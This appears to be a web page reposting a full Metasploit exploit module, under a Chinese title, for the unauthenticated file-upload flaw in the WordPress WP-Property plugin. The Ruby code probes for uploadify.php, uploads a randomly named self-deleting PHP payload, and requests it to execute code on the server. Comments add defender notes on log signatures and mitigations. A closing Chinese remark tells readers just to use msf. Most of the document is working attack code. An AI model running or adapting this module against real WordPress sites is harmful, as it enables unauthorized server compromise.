WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description).
#
# The plugin ships third-party/uploadify/uploadify.php, which accepts a
# multipart upload without authentication. The module uploads a PHP file
# through it and then requests the path the endpoint returns.
#
# Reviewer notes for defenders:
# * Traffic shape: a POST to .../wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in ".php", followed by a GET
#   for the path echoed in the response body. Web server access logs are the
#   place to look for this pair.
# * The payload is requested with :unlink_self => true, so the dropped file
#   presumably removes itself after it runs; its absence from disk does not
#   rule out a compromise.
# * Mitigation: remove or block the uploadify.php endpoint, move to a plugin
#   release outside the affected range (confirm against the vendor changelog),
#   and deny PHP execution in directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the TARGETURI option.
  def initialize(info = {})
    module_info = {
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'
    }

    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify endpoint.
  #
  # NOTE(review): the only signal used is an HTTP 200 on uploadify.php. The
  # plugin version is never inspected, so "Appears" means "the file is
  # reachable", not "the installed version is in the affected range".
  def check
    base = target_uri.path
    base << '/' unless base.end_with?('/')

    resp = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless resp && resp.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php, then requests it.
  def exploit
    base = target_uri.path
    base << '/' unless base.end_with?('/')

    peer          = "#{rhost}:#{rport}"
    plugin_dir    = "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload   = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file goes in "Filedata"; "folder" names the
    # destination directory and is set to the plugin's own uploadify directory.
    mime = Rex::MIME::Message.new
    mime.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    mime.add_part(plugin_dir, nil, nil, "form-data; name=\"folder\"")
    # Strip the leading CRLF in front of a boundary line at the start of a line.
    post_data = mime.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    upload = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{plugin_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => post_data
    })

    # Success is a 200 whose body mentions the uploaded file name.
    unless upload && upload.code == 200 && upload.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the URI of the stored file.
    upload_uri = upload.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
不要问我这写的是什么 怎么利用 我是说msf.